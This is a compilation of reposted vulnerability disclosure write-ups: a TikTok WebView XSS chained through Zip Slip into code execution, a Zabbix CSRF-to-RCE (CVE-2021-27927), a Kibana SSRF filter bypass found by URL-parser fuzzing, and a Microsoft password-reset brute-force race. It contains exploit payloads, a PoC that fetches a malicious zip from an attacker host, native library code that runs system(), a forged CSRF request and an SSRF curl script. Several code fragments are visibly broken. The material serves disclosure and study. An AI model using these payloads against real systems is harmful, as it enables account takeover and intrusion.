Universal XSS on TikTok WebView

TikTok uses a specific WebView that can be invoked by deep links and Inbox messages. The WebView handles something called falcon links by serving them from internal files instead of fetching them from the server every time the user opens them, to improve performance.

For performance-measuring purposes, the following function gets executed after the page finishes loading:

this.a.evaluateJavascript("JSON.stringify(window.performance.getEntriesByName(\'" + this.webviewURL + "\'))", v2);

The first idea that came to my mind was injecting an XSS payload in the URL to escape the function call and execute my malicious code.

I tried the following link'),alert(1));//

Unfortunately, it didn't work. I wrote a Frida script to hook the android.webkit.WebView.evaluateJavascript method to see what was happening.

I found the following string is passed to the method:


The payload was getting encoded because it was in the query-string segment, so I decided to put the payload in the fragment segment instead. After #'),alert(1));// will fire the following line:


Now it's done! We have a Universal XSS in that WebView.
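To make the breakout concrete, here is a sketch of the string concatenation (the URL value below stands in for the real falcon link with the payload in its fragment):

```javascript
// The WebView builds the JS to evaluate by naive string concatenation.
// The fragment is never URL-encoded, so a quote in it closes the string
// literal; alert(1) becomes a separate expression and // comments out the rest.
const webviewURL = "'),alert(1));//"; // hypothetical link
const evaluated =
  "JSON.stringify(window.performance.getEntriesByName('" + webviewURL + "'))";
// evaluated now contains attacker-controlled code outside the string literal
const breakout = evaluated.includes("'),alert(1));//");
```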

Notice: It’s Universal XSS because that javascript code is fired if the link contains something like:

For example, will fire this XSS too.


After finding this XSS, I started digging into that WebView to see how it could be harmful.

First, I set up my lab to make testing easy. I enabled the WebViewDebug module to debug the WebView from dev-tools in Google Chrome. You can find the module here:

I found that the WebView supports the intent scheme. This scheme lets you build a customized intent and launch it as an activity. It's helpful for bypassing the export setting of non-exported activities and maximizing the testing scope.

Read the following paper for more information about this intent scheme and how to implement it:

I tried to execute the following javascript code to open Activity:

location = "intent:#Intent;component=com.zhiliaoapp.musically/;package=com.zhiliaoapp.musically;action=android.intent.action.VIEW;end;"

But I didn’t notice any effect of executing that javascript. I back to the WebViewClient to see what was happening. And the following code came:

boolean v0_7 = v0_6 == null ? true : v0_6.hasClickInTimeInterval();
if((v8.i) && !v0_7) {
    v8.i = false;
    v4 = true;
}
else {
    v4 = v0_7;
}
This code prevents the intent scheme from taking effect unless the user has just clicked somewhere. Bad! I don't like 2-click exploits. I saved it in my notes and continued my digging trip.

ToutiaoJSBridge is a bridge implemented in the WebView. It has many fruitful functions; one of them is openSchema, which is used to open internal deep links. There is a deep link called aweme://wiki that is used to open URLs in the AddWikiActivity WebView.

Another XSS on AddWikiActivity

AddWikiActivity implements URL validation to make sure that no blacklisted URL will be opened in it. But the validation covered only the http and https schemes, because they assumed any other scheme is invalid and doesn't need validation:

if(!e.b(arg8)) {
    com.bytedance.t.c.e.b.a("AbsSecStrategy", "needBuildSecLink : url is invalid.");
    return false;
}

public static boolean b(String arg1) {
    return !TextUtils.isEmpty(arg1) && ((arg1.startsWith("http")) || (arg1.startsWith("https"))) && !e.a(arg1);
}

Pretty cool. Since the validation doesn't cover the javascript scheme, we can use that scheme to perform XSS attacks in that WebView too!

{
    "__callback_id": "0",
    "func": "openSchema",
    "__msg_type": "callback",
    "params": {
        "schema": "aweme://wiki?url=javascript://"
    },
    "JSSDK": "1",
    "namespace": "host",
    "__iframe_url": ""
}

<h1>PoC</h1> got printed on the WebView

Start Arbitrary Components

The good news is that the AddWikiActivity WebView supports the intent scheme too, without any restriction, provided the disable_app_link parameter is set to false. Easy!

If the following code gets executed in AddWikiActivity, the UserFavoritesActivity will be invoked:


Zip Slip in TmaTestActivity

Now, we can open any activity and pass any extras to it. I found an activity called TmaTestActivity in a split package called split_df_miniapp.apk.

Notice: the split packages aren't attached to the APK. They get downloaded after the first launch of the application by Google Play Core. You can find those packages with: adb shell pm path {package_name}

In a nutshell, TmaTestActivity is used to update the SDK by downloading a zip from the internet and extracting it.

Uri v5 = Uri.parse(Uri.decode(arg5.toString()));
String v0 = v5.getQueryParameter("action");
if(m.a(v0, "sdkUpdate")) {
    m.a(v5, "testUri");
    this.updateJssdk(arg4, v5, arg6);
}

To invoke the update process, we have to set the action parameter to sdkUpdate.

private final void updateJssdk(Context arg5, Uri arg6, TmaTestCallback arg7) {
    String v0 = arg6.getQueryParameter("sdkUpdateVersion");
    String v1 = arg6.getQueryParameter("sdkVersion");
    String v6 = arg6.getQueryParameter("latestSDKUrl");
    SharedPreferences.Editor v2 = BaseBundleDAO.getJsSdkSP(arg5).edit();
    v2.putString("sdk_update_version", v0).apply();
    v2.putString("sdk_version", v1).apply();
    v2.putString("latest_sdk_url", v6).apply();
    DownloadBaseBundleHandler v6_1 = new DownloadBaseBundleHandler();
    BundleHandlerParam v0_1 = new BundleHandlerParam();
    v6_1.setInitialParam(arg5, v0_1);
    ResolveDownloadHandler v5 = new ResolveDownloadHandler();
    SetCurrentProcessBundleVersionHandler v6_2 = new SetCurrentProcessBundleVersionHandler();
    // ...
}

It collects the SDK update information from the parameters, then invokes a DownloadBaseBundleHandler instance, then sets the next handler to ResolveDownloadHandler, then SetCurrentProcessBundleVersionHandler.

Let's start with DownloadBaseBundleHandler. It checks the sdkUpdateVersion parameter to see if it is newer than the current one. We can set the value to 99.99.99 to pass this check and start the download:

public BundleHandlerParam handle(Context arg14, BundleHandlerParam arg15) {
    String v0 = BaseBundleManager.getInst().getSdkCurrentVersionStr(arg14);
    String v8 = BaseBundleDAO.getJsSdkSP(arg14).getString("sdk_update_version", "");
    if(AppbrandUtil.convertVersionStrToCode(v0) >= AppbrandUtil.convertVersionStrToCode(v8) && (BaseBundleManager.getInst().isRealBaseBundleReadyNow())) {
        InnerEventHelper.mpLibResult("mp_lib_validation_result", v0, v8, "no_update", "", -1L);
        v10.appendLog("no need update remote basebundle version");
        arg15.isIgnoreTask = true;
        return arg15;
    }
    this.startDownload(v9, v10, arg15, v0, v8);
    // ...
}

In the startDownload method, I found the following:

v2.a = StorageUtil.getExternalCacheDir(AppbrandContext.getInst().getApplicationContext()).getPath();
v2.b = this.getMd5FromUrl(arg16);

v2.a is the download path. It gets the application context from AppbrandContext, which must have an instance. Unfortunately, the application doesn't init this instance all the time. But I told you that I spent 21 days on this exploit, yeah? That was enough to gain extensive knowledge about the application workflow. And yes, I had seen somewhere that this instance gets initialized.

Invoking the preloadMiniApp function through ToutiaoJSBridge initialized the instance for me! Digging into every function in this bridge, even ones that didn't look helpful at first, paid off in this situation ;).

v2.b is the md5sum of the downloaded file. It is taken from the filename itself:

private String getMd5FromUrl(String arg3) {
    return arg3.substring(arg3.lastIndexOf("_") + 1, arg3.lastIndexOf("."));
}

The filename must look like: anything_{md5sum_of_file}.zip because the md5sum will be compared with the file md5sum after downloading:

public void onDownloadSuccess(ad arg11) {
    File v11 = new File(this.val$tmaFileRequest.a, this.val$tmaFileRequest.b);
    long v6 = this.val$beginDownloadTime.getMillisAfterStart();
    if(!v11.exists()) {
        this.val$baseBundleEvent.appendLog("remote basebundle download fail");
        this.val$param.isLastTaskSuccess = false;
        this.val$baseBundleEvent.appendLog("remote basebundle not exist");
        InnerEventHelper.mpLibResult("mp_lib_download_result", this.val$localVersion, this.val$latestVersion, "fail", "md5_fail", v6);
    }
    else if(this.val$tmaFileRequest.b.equals(CharacterUtils.md5Hex(v11))) {
        this.val$baseBundleEvent.appendLog("remote basebundle download success, md5 verify success");
        this.val$param.isLastTaskSuccess = true;
        this.val$param.targetZipFile = v11;
        InnerEventHelper.mpLibResult("mp_lib_download_result", this.val$localVersion, this.val$latestVersion, "success", "", v6);
    }
    else {
        this.val$baseBundleEvent.appendLog("remote basebundle md5 not equals");
        InnerEventHelper.mpLibResult("mp_lib_download_result", this.val$localVersion, this.val$latestVersion, "fail", "md5_fail", v6);
        this.val$param.isLastTaskSuccess = false;
    }
}

After download processing finished, the file gets passed to ResolveDownloadHandler, to unzip It:

public BundleHandlerParam handle(Context arg13, BundleHandlerParam arg14) {
    BaseBundleEvent v0 = arg14.baseBundleEvent;
    if((arg14.isLastTaskSuccess) && arg14.targetZipFile != null && (arg14.targetZipFile.exists())) {
        arg14.bundleVersion = BaseBundleFileManager.unZipFileToBundle(arg13, arg14.targetZipFile, "download_bundle", false, v0);
        // ...
    }
}

public static long unZipFileToBundle(Context arg8, File arg9, String arg10, boolean arg11, BaseBundleEvent arg12) {
    long v10;
    boolean v4;
    Class v0 = BaseBundleFileManager.class;
    synchronized(v0) {
        boolean v1 = arg9.exists();
        if(!v1) {
            return 0L;
        }
        try {
            File v1_1 = BaseBundleFileManager.getBundleFolderFile(arg8, arg10);
            arg12.appendLog("start unzip" + arg10);
            BaseBundleFileManager.tryUnzipBaseBundle(arg12, arg10, v1_1.getAbsolutePath(), arg9);
            // ...
        }
    }
}

private static void tryUnzipBaseBundle(BaseBundleEvent arg2, String arg3, String arg4, File arg5) {
    try {
        arg2.appendLog("unzip" + arg3);
        IOUtils.unZipFolder(arg5.getAbsolutePath(), arg4);
    }
    // ...
}

public static void unZipFolder(String arg1, String arg2) throws Exception {
    IOUtils.a(new FileInputStream(arg1), arg2, false);
}

private static void a(InputStream arg5, String arg6, boolean arg7) throws Exception {
    ZipInputStream v0 = new ZipInputStream(arg5);
    while(true) {
        ZipEntry v5 = v0.getNextEntry();
        if(v5 == null) {
            break;
        }
        String v1 = v5.getName();
        if((arg7) && !TextUtils.isEmpty(v1) && (v1.contains("../"))) { // Notice arg7?
            goto label_2;
        }
        if(v5.isDirectory()) {
            new File(arg6 + File.separator + v1.substring(0, v1.length() - 1)).mkdirs();
            goto label_2;
        }
        File v5_1 = new File(arg6 + File.separator + v1);
        if(!v5_1.getParentFile().exists()) {
            // ...
        }
        FileOutputStream v1_1 = new FileOutputStream(v5_1);
        byte[] v5_2 = new byte[0x400];
        while(true) {
            int v3 =;
            if(v3 == -1) {
                break;
            }
            v1_1.write(v5_2, 0, v3);
        }
    }
}

In the last method called to unzip the file, there is a check for path traversal, but because arg7 value is false, the check won’t happen! Perfect!!

It makes us able to exploit ZIP Slip and overwrite some delicious files.

Time for RCE!

I created a zip file and path traversed the filename to overwrite /data/data/com.zhiliaoapp.musically/app_lib/df_rn_kit/df_rn_kit_a3e37c20900a22bc8836a51678e458f7/arm64-v8a/ file:

dphoeniixx@MacBook-Pro Tiktok % 7z l

7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=utf8,Utf16=on,HugeFiles=on,64 bits,16 CPUs x64)

Scanning the drive for archives:
1 file, 1930 bytes (2 KiB)

Listing archive:

Path =
Type = zip
Physical Size = 1930

Date Time Attr Size Compressed Name
------------------- ----- ------------ ------------ ------------------------
2020-11-26 04:08:29 ..... 5896 1496 ../../../../../../../../../data/data/com.zhiliaoapp.musically/app_lib/df_rn_kit/df_rn_kit_a3e37c20900a22bc8836a51678e458f7/arm64-v8a/
------------------- ----- ------------ ------------ ------------------------
2020-11-26 04:08:29 5896 1496 1 files

Now we can overwrite native libraries with a malicious library to execute our code. It won't be executed unless the user relaunches the application, but I found a way to reload that library without a relaunch by launching Activity.

Final PoC:

document.title = "Loading..";
if (document && != "finished") { // the XSS fires multiple times, before and after the page loads. This condition makes sure the payload won't run multiple times. = "finished";
    "__callback_id": "0",
    "func": "preloadMiniApp",
    "__msg_type": "callback",
    "params": {
        "mini_app_url": "https://microapp/"
    },
    "JSSDK": "1",
    "namespace": "host",
    "__iframe_url": "http://d.c/"
})); // initialize Mini App
    "__callback_id": "0",
    "func": "openSchema",
    "__msg_type": "callback",
    "params": {
        "schema": "aweme://wiki?url=javascript:location.replace({ATTACKER_HOST}"
    },
    "JSSDK": "1",
    "namespace": "host",
    "__iframe_url": ""
})); // download the malicious zip file that will overwrite /data/data/com.zhiliaoapp.musically/app_lib/df_rn_kit/df_rn_kit_a3e37c20900a22bc8836a51678e458f7/arm64-v8a/
setTimeout(function() {
        "__callback_id": "0",
        "func": "openSchema",
        "__msg_type": "callback",
        "params": {
            "schema": "aweme://wiki?url=javascript:location.replace("
        },
        "JSSDK": "1",
        "namespace": "host",
        "__iframe_url": ""
    })); // load the malicious library after overwriting it.
}, 5000);

Malicious library code:

#include <jni.h>
#include <string>
#include <stdlib.h>

JNIEXPORT jint JNI_OnLoad(JavaVM* vm, void* reserved) {
    system("id > /data/data/com.zhiliaoapp.musically/PoC");
    return JNI_VERSION_1_6;
}

TikTok Fixing!

TikTok Security implemented an excellent and responsible fix to address those vulnerabilities in a timely manner. The following actions were taken:

  1. The vulnerable XSS code has been deleted.
  2. TmaTestActivity has been deleted.
  3. Implemented restrictions on the intent scheme that disallow intents targeting the TikTok application on AddWikiActivity and the main WebView activity.

Have a nice day!

CVE-2021-27927: CSRF to RCE Chain in Zabbix

RCE Chain in Zabbix

Original text horizon3ai


Zabbix is an enterprise IT network and application monitoring solution. In a routine review of its source code, we discovered a CSRF (cross-site request forgery) vulnerability in the authentication component of the Zabbix UI. Using this vulnerability, an unauthenticated attacker can take over the Zabbix administrator’s account if the attacker can persuade the Zabbix administrator to follow a malicious link. This vulnerability is exploitable in all browsers even with the default SameSite=Lax cookie protection in place. The vulnerability is fixed in Zabbix versions 4.0.28rc1, 5.0.8rc1, 5.2.4rc1, and 5.4.0alpha1.


The impact of this vulnerability is high. While user interaction is required to exploit the vulnerability, the consequence of a successful exploit is full takeover of the Zabbix administrator account. Administrative access to Zabbix provides attackers a wealth of information about other devices on the network and the ability to execute arbitrary commands on the Zabbix server. In certain configurations, attackers can also execute arbitrary commands on hosts being monitored by Zabbix.

CVSS vector: AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

As of this writing, there are ~20K instances of Zabbix on the Internet that can be found with the Shodan dork "html: Zabbix".


Upgrade to at least Zabbix version 4.0.28rc1, 5.0.8rc1, 5.2.4rc1, or 5.4.0alpha1.


A CSRF exploit works as follows:

  • First, a user (the victim) logs in to a vulnerable web site (the target). "Logged in" in this case simply means the user's browser has stored within it a valid session cookie or basic authentication credential for the target web site. The browser application doesn't necessarily need to be open.  
  • Next, an attacker uses social engineering to persuade the victim user to follow a link to a malicious attacker-controlled web site. There are a variety of methods to achieve this such as phishing emails or links in chat, etc.  
  • When the victim visits the malicious web site, HTML/JavaScript code from the malicious site gets loaded into the victim’s browser. This code then sends an API request to the target web site. The request originating from the malicious web site looks legitimate to the victim’s browser, and as a result, the victim’s browser sends the user’s session cookies along with the request.  
  • The malicious request lands at the target web application. The target web application can’t tell that the request is coming from a malicious source. The target web application carries out the requested action on behalf of the attacker. CSRF attacks often try to abuse authentication-related actions such as creating or modifying users or changing passwords.

CSRF Attack Prevention

The most commonly used defense against CSRF attacks is to use anti-CSRF tokens. These tokens are randomly generated pieces of data that are sent as part of requests from an application’s frontend code to the backend. The backend verifies both the anti-CSRF token and the user’s session cookie. The token can be transferred as a HTTP header or in the request body, but not as a cookie. This method, if implemented correctly, defeats CSRF attacks because it becomes very difficult for attackers to craft forged requests that include the correct anti-CSRF token.

Zabbix uses an anti-CSRF token in the form of a sid parameter that's passed in the request body. For instance, the request to update the Zabbix Admin user's password to the value zabbix1 looks like this:

This request fails if the sid parameter is missing or incorrect.
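Conceptually, the backend check looks something like this (a sketch, not Zabbix's actual code; names are illustrative):

```javascript
// Sketch of an anti-CSRF token check: the request must carry the sid that
// was issued to this session. A forged cross-site request can include the
// victim's session cookie (the browser attaches it) but cannot know the sid.
function isRequestAuthorized(session, requestSid) {
  return Boolean(requestSid) && requestSid === session.sid;
}

const session = { sid: 'a1b2c3d4e5f60718' }; // issued at login, tied to the session

const legit = isRequestAuthorized(session, 'a1b2c3d4e5f60718'); // real frontend
const forged = isRequestAuthorized(session, undefined);          // CSRF request
```

A real implementation would also use a constant-time comparison, but the point is the same: the vulnerability below exists precisely where this check was skipped.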

Another measure that offers some protection against CSRF attacks is the Same-Site cookie attribute. This is a setting that browsers use to determine when it's OK to transfer cookies as part of cross-site requests to a site. This attribute has three values: Strict, Lax, and None.

  • Same-Site=Strict: Never send cookies as part of cross-site requests.
  • Same-Site=Lax: Only send cookies as part of cross-site requests if they are GET requests and effect a top-level navigation, i.e. result in a change to the browser’s address bar. Clicking a link is considered a top-level navigation, while loading an image or script is not. GET requests are generally considered safe because they are not supposed to mutate any backend state.
  • Same-Site=None: Send cookies along for all cross-site requests.

Web application developers can choose to set the value of the Same-Site attribute explicitly as part of sending a cookie to the front-end after a user authenticates. If the attribute is not set explicitly, modern browsers will default the value to Lax. This is the case with Zabbix — the Same-Site attribute is not set and it’s defaulted to Lax.

Zabbix CVE-2021-27927

As mentioned above, Zabbix uses anti-CSRF tokens, and these tokens are effective against CSRF attacks that attempt to exploit actions such as adding and modifying users and roles. However there was one important scenario we found in which anti-CSRF tokens were not being validated: an update to the application’s authentication settings.

This form controls the type of authentication that is used to log in to Zabbix, which can be one of "Internal" or "LDAP". In the case of LDAP, one can also set the details of the LDAP provider, such as the LDAP host and port, base DN, etc.

The backend controller class CControllerAuthenticationUpdate that handles this form submission had token validation turned off, as shown below:

In addition, and just as important, we found that in Zabbix any parameters submitted in a request body via POST could equivalently be submitted as URL query parameters via GET. This meant that the following forged GET request, which is missing the sid parameter, could work just as well as a legitimate POST request that contains the sid.

GET /zabbix.php?form_refresh=1&action=authentication.update&db_authentication_type=0&authentication_type=1&http_auth_enabled=0&ldap_configured=1&ldap_host=!&saml_auth_enabled=0&update=Update

The above request updates the authentication method to LDAP and sets various LDAP attributes.


To carry out a full attack, an attacker would do the following:

First, set up an attacker-controlled LDAP server that is network accessible to the target Zabbix application. For our example, we used an Active Directory server at We also provisioned a user called "Admin" (which matches the built-in Zabbix admin user name) inside Active Directory with the password "Z@bb1x!".  

Then, host a web site containing a malicious HTML page. For our example, we had an HTML page that contained a link with the forged cross-site request. Upon loading the page, the link would be automatically clicked via JavaScript. This meets the requirement for «top-level navigation.»


  <p>Any web site</p>
  <a id='link' href='!&saml_auth_enabled=0&update=Update'></a>


Finally, entice the victim Zabbix Admin user to click on a link to the malicious site. Once this happens, the Zabbix Admin would see that the authentication settings on the site were automatically updated like this:

At this point an attacker can log in with his/her own Admin user credential. Incidentally, the victim Zabbix Admin’s session still remains valid until he/she logs out.

One interesting aspect of this particular CSRF attack is that it’s not blind. This is because Zabbix validates the LDAP server connection using a test user and password as part of processing the authentication settings form submission. An attacker can know immediately if the CSRF attack was successful by virtue of the Zabbix application connecting to his/her own LDAP server. Once the test connection takes place, an attacker could automate logging into the victim’s Zabbix server and carrying out further actions.

Remote Command Execution

Once an attacker has gained admin access, he/she can gain remote command execution privileges easily because it is a built-in feature of the product. The Scripts section of the UI contains a place to drop in any commands to be executed on either the Zabbix server, a Zabbix server proxy, or a Zabbix agent (agents run on hosts being monitored by Zabbix).

For instance, to get a reverse shell on the Zabbix server, an attacker could modify the built-in Detect Operating Systems script to include a perl reverse shell payload like this:

Then execute the script off the dashboard page:

To get reverse shell:

Depending on the configuration, an attacker can also run remote commands at the server proxy or agent. More details here from the Zabbix documentation.


  • Jan. 3, 2021: Vulnerability disclosed to vendor
  • Jan. 13, 2021: Vulnerability fixed in code by vendor
  • Feb. 22, 2021: New releases made available by vendor across all supported versions
  • Mar. 3, 2021: Public disclosure  


SSRF: Bypassing hostname restrictions with fuzzing

SSRF: Bypassing hostname restrictions with fuzzing

Original text by dee__see

When the same data is parsed twice by different parsers, interesting security bugs can be introduced. In this post I will show how I used fuzzing to find a parser differential issue in Kibana's alerting and actions feature, and how I leveraged radamsa to fuzz NodeJS' URL parsers.

Kibana alerting and actions

Kibana has an alerting feature that allows users to trigger an action when certain conditions are met. There’s a variety of actions that can be chosen like sending an email, opening a ticket in Jira or sending a request to a webhook. To make sure this doesn’t become SSRF as a feature, there’s an xpack.actions.allowedHosts setting where users can configure a list of hosts that are allowed as webhook targets.

Parser differential

Parsing URLs consistently is notoriously difficult and sometimes the inconsistencies are there on purpose. Because of this, I was curious to see how the webhook target was validated against the xpack.actions.allowedHosts setting and how the URL was parsed before sending the request to the webhook. Is it the same parser? If not, are there any URLs that can appear fine to the hostname validation but target a completely different URL when sending the HTTP request?

After digging into the webhook code, I could identify that hostname validation happens in isHostnameAllowedInUri. The important part to notice is that the hostname is extracted from the webhook's URL by doing new URL(userInputUrl).hostname.

function isHostnameAllowedInUri(config: ActionsConfigType, uri: string): boolean {
  return pipe(
    tryCatch(() => new URL(uri)),
    map((url) => url.hostname),
    mapNullable((hostname) => isAllowed(config, hostname)),
    getOrElse<boolean>(() => false)
  );
}
On the other hand, the library that sends the HTTP request uses require('url').parse(userInputUrl).hostname to parse the hostname.

var url = require('url');

// ...

// Parse url
var fullPath = buildFullPath(config.baseURL, config.url);
var parsed = url.parse(fullPath);

// ...

options.hostname = parsed.hostname;

After reading some documentation, I could validate that those were effectively two different parsers and not just two ways of doing the same thing. Very interesting! Now I’m looking for a URL that is accepted by isHostnameAllowedInUri but results in an HTTP request to a different host. In other words, I’m looking for X where new URL(X).hostname !== require('url').parse(X).hostname and this is where the fuzzing comes in.

Fuzzing for SSRF

When you’re looking to generate test strings without going all in with coverage guided fuzzing like AFL or libFuzzer, radamsa is the perfect solution.

Radamsa is a test case generator for robustness testing, a.k.a. a fuzzer. It is typically used to test how well a program can withstand malformed and potentially malicious inputs. It works by reading sample files of valid data and generating interestingly different outputs from them.

The plan was the following:

  1. Feed a normal URL to radamsa as a starting point
  2. Parse radamsa’s output using both parsers
  3. If both parsed hostnames are different and valid, save that URL

Here’s the code used to do the fuzzing and validate the results:

const child_process = require('child_process');
const radamsa = child_process.spawn('./radamsa/bin/radamsa', ['-n', 'inf']);

radamsa.stdout.on('data', function (input) {
    input = 'http://' + input;

    // Resulting host names need to be valid for this to be useful
    function isInvalid(host) {
        return host === null || host === '' || !/^[a-zA-Z0-9.-]+$/.test(host);
    }

    let host1;
    try {
        host1 = new URL(input).hostname;
    } catch (e) {
        return; // Both hosts need to parse
    }

    if (isInvalid(host1)) return;
    if (/^([0-9.]+)$/.test(host1)) return; // host1 should be a domain, not an IP

    let host2;
    try {
        host2 = require('url').parse(input).hostname;
    } catch (e) {
        return; // Both hosts need to parse
    }

    if (isInvalid(host2)) return;
    if (host1 === host2) return;

    console.log(
        `${encodeURIComponent(input)} was parsed as ${host1} with URL constructor and ${host2} with url.parse.`
    );
});

There are some issues with that code, and I think the stdin writer might have trouble handling null bytes, but nevertheless, after a little while this popped up (the output was URL-encoded to catch non-printable characters): was parsed as domain.com4294967298 with the URL constructor and with url.parse.

With the original string containing the hostname<TAB>4294967298, one parser stripped the tab character and the other truncated the hostname where the tab was inserted. This is very interesting and can definitely be abused: imagine a webhook that requires the target to be, but when you enter<TAB>m, the filter thinks it's valid but the request is actually sent to. All the attacker has to do is register that domain and point it to or any other internal target, and it makes for a fun SSRF.

The attack

This is exactly what could be achieved in Kibana.

  1. Assume the xpack.actions.allowedHosts setting requires webhooks to target
  2. As the attacker, register
  3. Add a DNS record pointing to or any other internal IP
  4. Create a webhook action
  5. Use the API to send a test message to the webhook and specify the url<TAB>m
  6. Observe the response; in this case there were three different responses, allowing the attacker to differentiate between a live host, a live host that responds to HTTP requests, and a dead host

Here’s the script used to demonstrate the attack.


# The \t is important

# Create Webhook Action
connector_id=$(curl -sk -u "$creds" --url "$kibana_url/api/actions/action" -X POST -H 'Content-Type: application/json' -H 'kbn-xsrf: true' \
    -d '{"actionTypeId":".webhook","config":{"method":"post","hasAuth":false,"url":"'$ssrf_target'","headers":{"content-type":"application/json"}},"secrets":{"user":null,"password":null},"name":"'$(date +%s)'"}' |
    jq -r .id)

# Send request to target using the test function
curl -sk -u "$creds" --url "$kibana_url/api/actions/action/$connector_id/_execute" -X POST -H 'Content-Type: application/json' -H 'kbn-xsrf: true' \
    -d '{"params":{"body":"{\"arbitrary_payload_here\":true}"}}'

# Server should have received the request


Unfortunately, the resulting URL with the bypass is a bit mangled, as we can see from this output taken from the Node.js console:

> require('url').parse("htts://\x09m/path")
Url {
  protocol: 'htts:',
  slashes: true,
  auth: null,
  host: '',
  port: null,
  hostname: '',
  hash: null,
  search: null,
  query: null,
  pathname: '%09m/path',
  path: '%09m/path',
  href: 'htts://' }

The part that is truncated from the hostname is simply pushed into the path, which makes it hard to craft a request that achieves more than a basic internal network/port scan. However, if the parsers' roles had been inverted and new URL had been used for the request instead, I would have had a clean path and much more potential for exploitation, with a fully controlled path and POST body. This situation surely comes up somewhere; let me know if you come across something like it and manage to exploit it!
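For comparison, here is a quick sketch (again with a hypothetical example.com-based input) of how the WHATWG parser handles the same kind of tab-smuggled URL: the tab is simply stripped, leaving a clean hostname, path, and query string for the attacker to control.

```javascript
// In the inverted scenario, the request-side parser would see a clean URL
const u = new URL('http://exa\tmple.com/internal/api?debug=1');

console.log(u.hostname); // 'example.com'
console.log(u.pathname); // '/internal/api'
console.log(u.search);   // '?debug=1'
```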


A few things to take away from this:

  • When reviewing code, any time data is parsed for validation, make sure it's parsed the same way when it's being used
  • Fuzzing with radamsa is simple and quick to set up, and a great addition to any bug hunter's toolbelt
  • If you're doing blackbox testing and facing hostname validation in a Node.js environment, try adding some tabs and see where that leads

Thanks for reading!

(This was disclosed with permission)

How I Might Have Hacked Any Microsoft Account

Original text by LAXMAN MUTHIYAH

This article is about how I found a vulnerability in Microsoft online services that might have allowed anyone to take over any Microsoft account without consent. Microsoft's security team patched the issue and rewarded me $50,000 as part of their Identity Bounty Program.

After my Instagram account takeover vulnerability, I was searching for similar loopholes in other services. I found that Microsoft also uses a similar technique to reset users' passwords, so I decided to test it for any rate-limiting vulnerability.

To reset a Microsoft account's password, we need to enter our email address or phone number on their forgot-password page; after that, we are asked to select the email address or mobile number that can be used to receive a security code.

Once we receive the 7-digit security code, we have to enter it to reset the password. Here, if we could brute-force all combinations of the 7-digit code (that would be 10^7 = 10 million codes), we would be able to reset any user's password without permission. But, obviously, there would be some rate limits preventing us from making a large number of attempts.
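To make the size of that search space concrete, here is a small illustrative sketch (not part of the original attack code) that enumerates zero-padded n-digit codes; the full 7-digit space is 10^7 candidates.

```javascript
// Enumerate the full space of zero-padded n-digit codes (10^n candidates)
function* codeSpace(digits) {
  for (let i = 0; i < 10 ** digits; i++) {
    yield String(i).padStart(digits, '0');
  }
}

console.log(10 ** 7); // 10000000 candidate 7-digit codes

// Small demo: the 2-digit space runs from '00' to '99'
const twoDigit = [...codeSpace(2)];
console.log(twoDigit[0], twoDigit[twoDigit.length - 1], twoDigit.length); // 00 99 100
```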

The intercepted HTTP POST request made to the code-validation endpoint looked like this:

If you look at the screenshot above, the code 1234567 we entered was nowhere present in the request. It was encrypted and then sent for validation. I guess they do this to prevent automated brute-force tools from exploiting their system. So we cannot automate testing multiple codes using tools like Burp Intruder, since they won't do the encryption part 😕

After some time, I figured out the encryption technique and was able to automate the entire process, from encrypting the code to sending multiple concurrent requests.

My initial test showed the presence of rate limits, as expected. Out of 1000 codes sent, only 122 got through; the others were rejected with a 1211 error code, and the respective user account is blocked from further attempts if we keep sending requests continuously.

Then I tried sending simultaneous/concurrent requests like I did for Instagram. That allowed me to send a large number of requests without getting blocked, but I was still unable to get a successful response when injecting the correct 7-digit security code. I thought they had some controls in place to prevent this type of attack. Although I was getting an error while sending the right code, there was still no evidence of the user being blocked like we saw in the initial test, so I was still hoping that there would be something.


After some days, I realized that they blacklist the IP address if all the requests we send don't hit the server at the same time; even a few milliseconds of delay between the requests allowed the server to detect the attack and block it. I then tweaked my code to handle this scenario and tested it again.


Surprisingly, it worked and I was able to get the successful response this time 😀


I sent around 1000 seven-digit codes, including the right one, and was able to reach the next step of changing the password.

The above process is valid only for accounts that do not have two-factor authentication enabled; if a user has 2FA enabled, we have to bypass the two-factor code authentication as well to change the password.

I tested an account with 2FA and found that both checks go through endpoints vulnerable to the same type of attack. First, the user is prompted to enter the 6-digit code generated by their authenticator app; only then are they asked to enter the 7-digit code sent to their email or phone number. After that, they can change the password.

Putting it all together, an attacker has to send all the possibilities of the 6-digit and 7-digit security codes, around 11 million request attempts, all concurrently, to change the password of any Microsoft account (including those with 2FA enabled).

It is not at all an easy process to send such a large number of concurrent requests; it would require a lot of computing resources, as well as thousands of IP addresses, to complete the attack successfully.

Immediately, I recorded a video of all the bypasses and submitted it to Microsoft along with detailed steps to reproduce the vulnerability. They were quick to acknowledge the issue.

The issue was patched in November 2020, and my case was initially assigned a different security impact than the one expected. I asked them to reconsider, explaining my attack. After a few back-and-forth emails, my case was assigned Elevation of Privilege (Involving Multi-factor Authentication Bypass). Due to the complexity of the attack, the bug severity was assigned as Important instead of Critical.

Bounty email from MSRC

Microsoft Acknowledgement for Reporting this issue

I received the bounty of $50,000 USD on Feb 9th, 2021 through HackerOne and got approval to publish this article on March 1st. I would like to thank Dan, Jarek, and the entire MSRC team for patiently listening to all my comments, providing updates, and patching the issue. I'd also like to thank Microsoft for the bounty 🙏 😊